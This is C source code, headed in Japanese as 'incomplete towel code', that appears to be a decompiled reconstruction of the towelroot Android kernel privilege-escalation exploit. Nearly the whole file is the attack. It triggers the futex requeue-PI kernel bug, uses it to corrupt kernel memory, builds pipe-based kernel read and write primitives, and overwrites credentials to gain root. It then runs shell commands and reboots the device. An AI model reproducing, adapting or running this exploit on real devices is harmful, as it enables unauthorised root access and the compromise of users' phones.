不完全なタオルのコード

1. //Android.mk にて、「LOCAL_CFLAGS := -fno-stack-protector -mno-thumb -O0」を指定すること。
2.  
3. #include <stdio.h>
4. #include <stdlib.h>
5. #include <sys/socket.h>
6. #include <arpa/inet.h>
7. #include <pthread.h>
8. #include <sys/mman.h>
9. #include <sys/syscall.h>
10. #include <linux/futex.h>
11. #include <sys/resource.h>
12. #include <string.h>
13. #include <fcntl.h>
14.  
15. #define FUTEX_WAIT_REQUEUE_PI 11
16. #define FUTEX_CMP_REQUEUE_PI 12
17.  
18. struct mmsghdr {
19. struct msghdr msg_hdr;
20. unsigned int msg_len;
21. };
22.  
23. struct phonefmt {
24. char *version;
25. unsigned long l1;
26. unsigned long l2;
27. unsigned long l3;
28. };
29.  
30. //rodata
31. const char str_ffffffff[] = {0xff, 0xff, 0xff, 0xff, 0};
32. const char str_1[] = {1, 0, 0, 0, 0};
33.  
34. //data
35. char su[] = {0};
36. size_t su_len = 1;
37. char install_recovery_sh[] = {0};
38. size_t install_recovery_sh_len = 1;
39.  
40. struct phonefmt default_phone = {"", 0, 1, 0};
41. struct phonefmt new_samsung = {"Linux version 3.4.0-", 1, 1, 0x00001cd4};
42. struct phonefmt phones[1] = {"Linux version 3.4.0-722276", 1, 1, 0x00001cd4};
43. struct phonefmt *ph = &default_phone;
44.  
45. //bss
46. int _swag = 0;
47. int _swag2 = 0;
48. unsigned long HACKS_final_stack_base = 0;
49. pid_t waiter_thread_tid;
50. pthread_mutex_t done_lock;
51. pthread_cond_t done;
52. pthread_mutex_t is_thread_desched_lock;
53. pthread_cond_t is_thread_desched;
54. int do_socket_tid_read = 0;
55. int did_socket_tid_read = 0;
56. int do_splice_tid_read = 0;
57. int did_splice_tid_read = 0;
58. int do_dm_tid_read = 0;
59. int did_dm_tid_read = 0;
60. pthread_mutex_t is_thread_awake_lock;
61. pthread_cond_t is_thread_awake;
62. int HACKS_fdm = 0;
63. unsigned long MAGIC = 0;
64. unsigned long MAGIC_ALT = 0;
65. pthread_mutex_t *is_kernel_writing;
66. pid_t last_tid = 0;
67.  
68.  
69. sub_bd38() {
70. char filebuf[0x1000];
71. FILE *fp;
72. int i;
73. char *pdest;
74. int foundph;
75. int ret;
76. int kernel_num;
77.  
78. __aeabi_memset(filebuf, 0x1000, 0);
79. fp = fopen("/proc/version", "rb");
80. fread(filebuf, 1, 0xfff, fp);
81. fclose(fp);
82.  
83. printf("got kernel version %s\n", filebuf);
84.  
85. for (i = 0; i < 1; i++) {
86. pdest = strstr(filebuf, phones[i].version);
87. if (pdest != 0) {
88. printf("found matching phone: %s\n", phones[i].version);
89. ph = &phones[i];
90. foundph = 1;
91.  
92. return;
93. }
94. }
95.  
96. ret = memcmp(filebuf, new_samsung.version, strlen(new_samsung.version));
97. if (ret == 0) {
98. pdest = filebuf + strlen(new_samsung.version);
99. kernel_num = atoi(pdest);
100. printf("got kernel number %d\n", kernel_num);
101.  
102. if (kernel_num > 951485) {
103. printf("using new samsung\n");
104. ph = &new_samsung;
105. foundph = 1;
106. return;
107. }
108. }
109.  
110. printf("no matching phone found, trying default\n");
111. foundph = 0;
112.  
113. return;
114. }
115.  
116. ssize_t sub_ba44(void *writebuf, void *readbuf, size_t count) {
117. int pipefd[2];
118. ssize_t len;
119.  
120. pipe(pipefd);
121.  
122. len = write(pipefd[1], writebuf, count);
123.  
124. if (len != count) {
125. printf("FAILED READ @ %p : %d %d\n", writebuf, (int)len, errno);
126. while (1) {
127. sleep(10);
128. }
129. }
130.  
131. read(pipefd[0], readbuf, count);
132.  
133. close(pipefd[0]);
134. close(pipefd[1]);
135.  
136. return len;
137. }
138.  
139. ssize_t sub_b7d8(void *readbuf, void *writebuf, size_t count) {
140. int pipefd[2];
141. ssize_t len;
142.  
143. pipe(pipefd);
144.  
145. write(pipefd[1], writebuf, count);
146. len = read(pipefd[0], readbuf, count);
147.  
148. if (len != count) {
149. printf("FAILED WRITE @ %p : %d %d\n", readbuf, (int)len, errno);
150. while (1) {
151. sleep(10);
152. }
153. }
154.  
155. close(pipefd[0]);
156. close(pipefd[1]);
157.  
158. return len;
159. }
160.  
161. void sub_881c(int signum) {
162. char *slavename;
163. int pipefd[2];
164. char readbuf[0x100];
165. unsigned long stackbuf[4];
166. unsigned long buf_a[0x100];
167. unsigned long val1;
168. unsigned long buf_b[0x40];
169. unsigned long val2;
170. unsigned long buf_c[6];
171. pid_t pid;
172. int i;
173. int ret;
174. FILE *fp;
175.  
176. pthread_mutex_lock(&is_thread_awake_lock);
177. pthread_cond_signal(&is_thread_awake);
178. pthread_mutex_unlock(&is_thread_awake_lock);
179.  
180. if (HACKS_final_stack_base == 0) {
181. printf("cpid1 resumed\n");
182.  
183. pthread_mutex_lock(is_kernel_writing);
184.  
185. HACKS_fdm = open("/dev/ptmx", O_RDWR);
186. unlockpt(HACKS_fdm);
187. slavename = ptsname(HACKS_fdm);
188.  
189. open(slavename, O_RDWR);
190.  
191. if (ph->l3 != 0) {
192. pipe(pipefd);
193.  
194. do_splice_tid_read = 1;
195. while (1) {
196. if (did_splice_tid_read != 0) {
197. break;
198. }
199. }
200.  
201. syscall(__NR_splice, HACKS_fdm, NULL, pipefd[1], NULL, 0x100, 0);
202. } else {
203. do_splice_tid_read = 1;
204. while (1) {
205. if (did_splice_tid_read != 0) {
206. break;
207. }
208. }
209.  
210. read(HACKS_fdm, readbuf, 0x100);
211.  
212. }
213.  
214. sub_b7d8((void *)(HACKS_final_stack_base + 8), (void *)str_ffffffff, 4);
215.  
216. pthread_mutex_unlock(is_kernel_writing);
217.  
218. while (1) {
219. sleep(10);
220. }
221. }
222.  
223. printf("cpid3 resumed\n");
224.  
225. pthread_mutex_lock(is_kernel_writing);
226.  
227. printf("WOOT\n");
228.  
229. sub_ba44((void *)HACKS_final_stack_base, stackbuf, 0x10);
230. sub_ba44((void *)(stackbuf[3]), buf_a, 0x400);
231.  
232. val1 = 0;
233. val2 = 0;
234. pid = 0;
235.  
236. for (i = 0; i < 0x100; i++) {
237. if (buf_a[i] == buf_a[i + 1]) {
238. if (buf_a[i] > 0xc0000000) {
239. if (buf_a[i + 2] == buf_a[i + 3]) {
240. if (buf_a[i + 2] > 0xc0000000) {
241. if (buf_a[i + 4] == buf_a[i + 5]) {
242. if (buf_a[i + 4] > 0xc0000000) {
243. if (buf_a[i + 6] == buf_a[i + 7]) {
244. if (buf_a[i + 6] > 0xc0000000) {
245. val1 = buf_a[i + 7];
246. break;
247. }
248. }
249. }
250. }
251. }
252. }
253. }
254. }
255. }
256.  
257. sub_ba44((void *)val1, buf_b, 0x100);
258. val2 = buf_b[0x16];
259. if (val2 > 0xc0000000) {
260. if (val2 < 0xffff0000) {
261. sub_ba44((void *)val2, buf_c, 0x18);
262. if (buf_c[0] != 0) {
263. if (buf_c[1] != 0) {
264. if (buf_c[2] == 0) {
265. if (buf_c[3] == 0) {
266. if (buf_c[4] == 0) {
267. if (buf_c[5] == 0) {
268. buf_c[0] = 1;
269. buf_c[1] = 1;
270.  
271. printf("YOU ARE A SCARY PHONE\n");
272.  
273. sub_b7d8((void *)val2, buf_c, 0x18);
274. }
275. }
276. }
277. }
278. }
279. }
280. }
281. }
282.  
283. buf_b[1] = 0;
284. buf_b[2] = 0;
285. buf_b[3] = 0;
286. buf_b[4] = 0;
287. buf_b[5] = 0;
288. buf_b[6] = 0;
289. buf_b[7] = 0;
290. buf_b[8] = 0;
291.  
292. buf_b[10] = 0xffffffff;
293. buf_b[11] = 0xffffffff;
294. buf_b[12] = 0xffffffff;
295. buf_b[13] = 0xffffffff;
296. buf_b[14] = 0xffffffff;
297. buf_b[15] = 0xffffffff;
298. buf_b[16] = 0xffffffff;
299. buf_b[17] = 0xffffffff;
300.  
301. sub_b7d8((void *)val1, buf_b, 0x48);
302.  
303. pid = syscall(__NR_gettid);
304.  
305. i = 0;
306. while (1) {
307. if (buf_a[i] == pid) {
308. sub_b7d8((void *)(stackbuf[3] + (i << 2)), (void *)str_1, 4);
309.  
310. if (getuid() != 0) {
311. printf("ROOT FAILED\n");
312. while (1) {
313. sleep(10);
314. }
315. } else { //rooted
316. break;
317. }
318. }
319.  
320. i++;
321. }
322.  
323. //rooted
324.  
325. ret = system("/system/bin/touch /data/local/tmp/foo");
326. if (ret != 0) {
327. printf("COMMAND FAILED\n");
328. while (1) {
329. sleep(10);
330. }
331. }
332.  
333. pid = fork();
334. if (pid == 0) { //child
335. printf("rebooting in 15\n");
336.  
337. sleep(15);
338.  
339. printf("rebooting\n");
340.  
341. system("reboot");
342.  
343. while (1) {
344. sleep(10);
345. }
346. }
347.  
348. pthread_mutex_lock(&done_lock);
349. pthread_cond_signal(&done);
350. pthread_mutex_unlock(&done_lock);
351.  
352. while (1) {
353. sleep(10);
354. }
355.  
356. return;
357. }
358.  
359. void *sub_8394(void *arg) {
360. int prio;
361. struct sigaction act;
362. int ret;
363.  
364. prio = (int)arg;
365. last_tid = syscall(__NR_gettid);
366.  
367. pthread_mutex_lock(&is_thread_desched_lock);
368. pthread_cond_signal(&is_thread_desched);
369.  
370. act.sa_handler = sub_881c;
371. act.sa_mask = 0;
372. act.sa_flags = 0;
373. act.sa_restorer = NULL;
374. sigaction(12, &act, NULL);
375.  
376. setpriority(PRIO_PROCESS, 0, prio);
377.  
378. pthread_mutex_unlock(&is_thread_desched_lock);
379.  
380. do_dm_tid_read = 1;
381.  
382. while (1) {
383. if (did_dm_tid_read != 0) {
384. break;
385. }
386. }
387.  
388. ret = syscall(__NR_futex, &_swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);
389. printf("futex dm: %d\n", ret);
390.  
391. while (1) {
392. sleep(10);
393. }
394.  
395. return NULL;
396. }
397.  
398. pid_t sub_7690(int prio) {
399. pthread_t th4;
400. pid_t pid;
401. char filename[256];
402. FILE *fp;
403. char filebuf[0x1000];
404. char *pdest;
405. int vcscnt, vcscnt2;
406.  
407. do_dm_tid_read = 0;
408. did_dm_tid_read = 0;
409.  
410. pthread_mutex_lock(&is_thread_desched_lock);
411. pthread_create(&th4, 0, sub_8394, (void *)prio);
412. pthread_cond_wait(&is_thread_desched, &is_thread_desched_lock);
413.  
414. pid = last_tid;
415.  
416. sprintf(filename, "/proc/self/task/%d/status", pid);
417.  
418. fp = fopen(filename, "rb");
419. if (fp == 0) {
420. vcscnt = -1;
421. } else {
422. fread(filebuf, 1, 0x1000, fp);
423. pdest = strstr(filebuf, "voluntary_ctxt_switches");
424. pdest += 0x19;
425. vcscnt = atoi(pdest);
426. fclose(fp);
427. }
428.  
429. while (1) {
430. if (do_dm_tid_read != 0) {
431. break;
432. }
433. usleep(10);
434. }
435.  
436. did_dm_tid_read = 1;
437.  
438. while (1) {
439. sprintf(filename, "/proc/self/task/%d/status", pid);
440. fp = fopen(filename, "rb");
441. if (fp == 0) {
442. vcscnt2 = -1;
443. } else {
444. fread(filebuf, 1, 0x1000, fp);
445. pdest = strstr(filebuf, "voluntary_ctxt_switches");
446. pdest += 0x19;
447. vcscnt2 = atoi(pdest);
448. fclose(fp);
449. }
450.  
451. if (vcscnt2 == vcscnt + 1) {
452. break;
453. }
454. usleep(10);
455.  
456. }
457.  
458. pthread_mutex_unlock(&is_thread_desched_lock);
459.  
460. return pid;
461. }
462.  
463. int sub_7390() {
464. int sockfd;
465. struct sockaddr_in addr = {0};
466. int ret;
467. int sock_buf_size;
468.  
469. sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);
470. if (sockfd < 0) {
471. printf("socket failed\n");
472. usleep(10);
473. } else {
474. addr.sin_family = AF_INET;
475. addr.sin_port = htons(5551);
476. addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
477. }
478.  
479. while (1) {
480. ret = connect(sockfd, (struct sockaddr *)&addr, 16);
481. if (ret >= 0) {
482. break;
483. }
484. usleep(10);
485. }
486.  
487. sock_buf_size = 1;
488. setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size));
489.  
490. return sockfd;
491. }
492.  
493. void *sub_5960(void *arg) {
494. int sockfd;
495. struct mmsghdr msgvec[1];
496. struct iovec msg_iov[8];
497. unsigned long databuf[0x20];
498. int i;
499. int ret;
500.  
501. waiter_thread_tid = syscall(__NR_gettid);
502. setpriority(PRIO_PROCESS, 0, 12);
503.  
504. sockfd = sub_7390();
505.  
506. for (i = 0; i < 0x20; i++) {
507. databuf[i] = MAGIC;
508. }
509.  
510. if (ph->l2 == 0) {
511. for (i = 0; i < 8; i++) {
512. msg_iov[i].iov_base = (void *)MAGIC;
513. msg_iov[i].iov_len = MAGIC_ALT;
514. }
515. } else {
516. for (i = 0; i < 8; i++) {
517. msg_iov[i].iov_base = (void *)MAGIC;
518. msg_iov[i].iov_len = 0x10;
519. }
520. }
521.  
522. msgvec[0].msg_hdr.msg_name = databuf;
523. msgvec[0].msg_hdr.msg_namelen = 0x80;
524. msgvec[0].msg_hdr.msg_iov = msg_iov;
525. msgvec[0].msg_hdr.msg_iovlen = 8;
526. msgvec[0].msg_hdr.msg_control = databuf;
527. msgvec[0].msg_hdr.msg_controllen = 0x20;
528. msgvec[0].msg_hdr.msg_flags = 0;
529. msgvec[0].msg_len = 0;
530.  
531. syscall(__NR_futex, &_swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &_swag2, 0);
532.  
533. do_socket_tid_read = 1;
534.  
535. while (1) {
536. if (did_socket_tid_read != 0) {
537. break;
538. }
539. }
540.  
541. ret = 0;
542. if (ph->l1 == 0) {
543. while (1) {
544. ret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0);
545. if (ret <= 0) {
546. break;
547. }
548. }
549. } else {
550. if (ph->l1 == 1) {
551. ret = syscall(__NR_recvmmsg, sockfd, msgvec, 1, 0, NULL);
552. } else {
553. if (ph->l1 == 2) {
554. while (1) {
555. ret = sendmsg(sockfd, &(msgvec[0].msg_hdr), 0);
556. if (ret <= 0) {
557. break;
558. }
559. }
560. } else {
561. if (ph->l1 == 3) {
562. ret = recvmsg(sockfd, &(msgvec[0].msg_hdr), 0);
563. }
564. }
565. }
566. }
567.  
568. if (ret < 0) {
569. perror("SOCKSHIT");
570. }
571. printf("EXIT WTF\n");
572. while (1) {
573. sleep(10);
574. }
575.  
576. return NULL;
577. }
578.  
579. void *sub_1b08(void *arg) {
580. int ret;
581. char filename[256];
582. FILE *fp;
583. char filebuf[0x1000];
584. char *pdest;
585. int vcscnt, vcscnt2;
586. unsigned long magicval;
587. pid_t pid;
588. unsigned long goodval, goodval2;
589. unsigned long addr, setaddr;
590. int i;
591. char buf[0x1000];
592.  
593. syscall(__NR_futex, &_swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);
594.  
595. while (1) {
596. ret = syscall(__NR_futex, &_swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &_swag2, _swag);
597. if (ret == 1) {
598. break;
599. }
600. usleep(10);
601. }
602.  
603. sub_7690(6);
604. sub_7690(7);
605.  
606. _swag2 = 0;
607. do_socket_tid_read = 0;
608. did_socket_tid_read = 0;
609.  
610. syscall(__NR_futex, &_swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &_swag2, _swag2);
611.  
612. while (1) {
613. if (do_socket_tid_read != 0) {
614. break;
615. }
616. }
617.  
618. sprintf(filename, "/proc/self/task/%d/status", waiter_thread_tid);
619.  
620. fp = fopen(filename, "rb");
621. if (fp == 0) {
622. vcscnt = -1;
623. } else {
624. fread(filebuf, 1, 0x1000, fp);
625. pdest = strstr(filebuf, "voluntary_ctxt_switches");
626. pdest += 0x19;
627. vcscnt = atoi(pdest);
628. fclose(fp);
629. }
630.  
631. did_socket_tid_read = 1;
632.  
633. while (1) {
634. sprintf(filename, "/proc/self/task/%d/status", waiter_thread_tid);
635. fp = fopen(filename, "rb");
636. if (fp == 0) {
637. vcscnt2 = -1;
638. } else {
639. fread(filebuf, 1, 0x1000, fp);
640. pdest = strstr(filebuf, "voluntary_ctxt_switches");
641. pdest += 0x19;
642. vcscnt2 = atoi(pdest);
643. fclose(fp);
644. }
645.  
646. if (vcscnt2 == vcscnt + 1) {
647. break;
648. }
649. usleep(10);
650. }
651.  
652. printf("starting the dangerous things\n");
653.  
654. *((unsigned long *)(MAGIC_ALT - 4)) = 0x81;
655. *((unsigned long *)MAGIC_ALT) = MAGIC_ALT + 0x20;
656. *((unsigned long *)(MAGIC_ALT + 8)) = MAGIC_ALT + 0x28;
657. *((unsigned long *)(MAGIC_ALT + 0x1c)) = 0x85;
658. *((unsigned long *)(MAGIC_ALT + 0x24)) = MAGIC_ALT;
659. *((unsigned long *)(MAGIC_ALT + 0x2c)) = MAGIC_ALT + 8;
660.  
661. *((unsigned long *)(MAGIC - 4)) = 0x81;
662. *((unsigned long *)MAGIC) = MAGIC + 0x20;
663. *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28;
664. *((unsigned long *)(MAGIC + 0x1c)) = 0x85;
665. *((unsigned long *)(MAGIC + 0x24)) = MAGIC;
666. *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8;
667.  
668. magicval = *((unsigned long *)MAGIC);
669.  
670. sub_7690(11);
671.  
672. if (*((unsigned long *)MAGIC) == magicval) {
673. printf("using MAGIC_ALT\n");
674. MAGIC = MAGIC_ALT;
675. }
676.  
677. while (1) {
678. is_kernel_writing = (pthread_mutex_t *)malloc(4);
679. pthread_mutex_init(is_kernel_writing, NULL);
680.  
681. *((unsigned long *)(MAGIC - 4)) = 0x81;
682. *((unsigned long *)MAGIC) = MAGIC + 0x20;
683. *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28;
684. *((unsigned long *)(MAGIC + 0x1c)) = 0x85;
685. *((unsigned long *)(MAGIC + 0x24)) = MAGIC;
686. *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8;
687.  
688. pid = sub_7690(11);
689.  
690. goodval = *((unsigned long *)MAGIC) & 0xffffe000;
691.  
692. printf("%p is a good number\n", (void *)goodval);
693.  
694. do_splice_tid_read = 0;
695. did_splice_tid_read = 0;
696.  
697. pthread_mutex_lock(&is_thread_awake_lock);
698.  
699. kill(pid, 12);
700.  
701. pthread_cond_wait(&is_thread_awake, &is_thread_awake_lock);
702. pthread_mutex_unlock(&is_thread_awake_lock);
703.  
704. while (1) {
705. if (do_splice_tid_read != 0) {
706. break;
707. }
708. usleep(10);
709. }
710.  
711. sprintf(filename, "/proc/self/task/%d/status", pid);
712. fp = fopen(filename, "rb");
713. if (fp == 0) {
714. vcscnt = -1;
715. } else {
716. fread(filebuf, 1, 0x1000, fp);
717. pdest = strstr(filebuf, "voluntary_ctxt_switches");
718. pdest += 0x19;
719. vcscnt = atoi(pdest);
720. fclose(fp);
721. }
722.  
723. did_splice_tid_read = 1;
724.  
725. while (1) {
726. sprintf(filename, "/proc/self/task/%d/status", pid);
727. fp = fopen(filename, "rb");
728. if (fp == 0) {
729. vcscnt2 = -1;
730. } else {
731. fread(filebuf, 1, 0x1000, fp);
732. pdest = strstr(filebuf, "voluntary_ctxt_switches");
733. pdest += 19;
734. vcscnt2 = atoi(pdest);
735. fclose(fp);
736. }
737.  
738. if (vcscnt2 != vcscnt + 1) {
739. break;
740. }
741. usleep(10);
742. }
743.  
744. goodval2 = 0;
745. if (ph->l3 != 0) {
746. addr = (unsigned long)mmap((unsigned long *)0xbef000, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
747. if (addr != 0xbef000) {
748. continue;
749. }
750.  
751. *((unsigned long *)0xbeffdc) = 0x81;
752. *((unsigned long *)0xbeffe0) = 0xbf0000;
753. *((unsigned long *)0xbeffe8) = 0xbf0008;
754. *((unsigned long *)0xbefffc) = 0x85;
755. *((unsigned long *)0xbf0004) = 0xbeffe0;
756. *((unsigned long *)0xbf000c) = 0xbeffe8;
757. *((unsigned long *)0xbf0004) = 0xbef000 + ph->l3 + 1;
758.  
759. *((unsigned long *)MAGIC) = 0xbf0000;
760.  
761. sub_7690(10);
762.  
763. goodval2 = *((unsigned long *)0x00bf0004);
764.  
765. munmap((unsigned long *)0xbef000, 0x2000);
766.  
767. goodval2 <<= 8;
768. if (goodval2 < 0xc0000000) {
769.  
770. setaddr = (goodval2 - 0x1000) & 0xfffff000;
771.  
772. addr = (unsigned long)mmap((unsigned long *)setaddr, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
773. if (addr != setaddr) {
774. continue;
775. }
776.  
777. *((unsigned long *)(goodval2 - 0x1c)) = 0x81;
778. *((unsigned long *)(goodval2 - 0x20)) = goodval2;
779. *((unsigned long *)(goodval2 - 0x18)) = goodval2 + 8;
780. *((unsigned long *)(goodval2 - 4)) = 0x85;
781. *((unsigned long *)(goodval2 + 4)) = goodval2 - 0x20;
782. *((unsigned long *)(goodval2 + 0xc)) = goodval2 - 0x18;
783.  
784. *((unsigned long *)(goodval2 + 4)) = goodval + ph->l3;
785.  
786. *((unsigned long *)MAGIC) = goodval2;
787.  
788. sub_7690(10);
789.  
790. goodval2 = *((unsigned long *)(goodval2 + 4));
791.  
792. munmap((unsigned long *)setaddr, 0x2000);
793. }
794. } else {
795. *((unsigned long *)(MAGIC - 4)) = 0x81;
796. *((unsigned long *)MAGIC) = MAGIC + 0x20;
797. *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28;
798. *((unsigned long *)(MAGIC + 0x1c)) = 0x85;
799. *((unsigned long *)(MAGIC + 0x24)) = MAGIC;
800. *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8;
801.  
802. *((unsigned long *)(MAGIC + 0x24)) = goodval + 8;
803.  
804. sub_7690(12);
805. goodval2 = *((unsigned long *)(MAGIC + 0x24));
806. }
807.  
808. printf("%p is also a good number\n", (void *)goodval2);
809.  
810. for (i = 0; i < 9; i++) {
811. *((unsigned long *)(MAGIC - 4)) = 0x81;
812. *((unsigned long *)MAGIC) = MAGIC + 0x20;
813. *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28;
814. *((unsigned long *)(MAGIC + 0x1c)) = 0x85;
815. *((unsigned long *)(MAGIC + 0x24)) = MAGIC;
816. *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8;
817.  
818. pid = sub_7690(10);
819.  
820. if (*((unsigned long *)MAGIC) < goodval2) {
821. HACKS_final_stack_base = *((unsigned long *)MAGIC) & 0xffffe000;
822.  
823. pthread_mutex_lock(&is_thread_awake_lock);
824.  
825. kill(pid, 12);
826.  
827. pthread_cond_wait(&is_thread_awake, &is_thread_awake_lock);
828. pthread_mutex_unlock(&is_thread_awake_lock);
829.  
830. printf("GOING\n");
831.  
832. write(HACKS_fdm, buf, 0x1000);
833.  
834. while (1) {
835. sleep(10);
836. }
837. }
838.  
839. }
840. }
841.  
842. return NULL;
843. }
844.  
845. void *sub_189c(void *arg) {
846. int sockfd;
847. int yes;
848. struct sockaddr_in addr = {0};
849. int ret;
850.  
851. sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);
852.  
853. yes = 1;
854. setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes));
855.  
856. addr.sin_family = AF_INET;
857. addr.sin_port = htons(5551);
858. addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
859. bind(sockfd, (struct sockaddr *)&addr, sizeof(addr));
860.  
861. listen(sockfd, 1);
862.  
863. while(1) {
864. ret = accept(sockfd, NULL, NULL);
865. if (ret < 0) {
866. printf("**** SOCK_PROC FAILED ****\n");
867. while(1) {
868. sleep(10);
869. }
870. } else {
871. printf("i have a client like hookers\n");
872. }
873. }
874.  
875. return NULL;
876. }
877.  
878. sub_12c0() {
879. unsigned long addr;
880. pthread_t th1, th2, th3;
881.  
882. printf("************************\n");
883. printf("native towelroot running with pid %d\n", getpid());
884.  
885. sub_bd38();
886.  
887. pthread_create(&th1, NULL, sub_189c, NULL);
888.  
889. addr = (unsigned long)mmap((void *)0xa0000000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
890. addr += 0x800;
891. MAGIC = addr;
892. if ((long)addr >= 0) {
893. printf("first mmap failed?\n");
894. while (1) {
895. sleep(10);
896. }
897. }
898.  
899. addr = (unsigned long)mmap((void *)0x100000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
900. addr += 0x800;
901. MAGIC_ALT = addr;
902. if (addr > 0x110000) {
903. printf("second mmap failed?\n");
904. while (1) {
905. sleep(10);
906. }
907. }
908.  
909. pthread_mutex_lock(&done_lock);
910. pthread_create(&th2, NULL, sub_1b08, NULL);
911. pthread_create(&th3, NULL, sub_5960, NULL);
912. pthread_cond_wait(&done, &done_lock);
913.  
914. return;
915. }
916.  
917. int main(void) {
918. sub_12c0();
919.  
920. printf("Thank you for using towelroot!\n");
921.  
922. sleep(30);
923.  
924. return 0;
925. }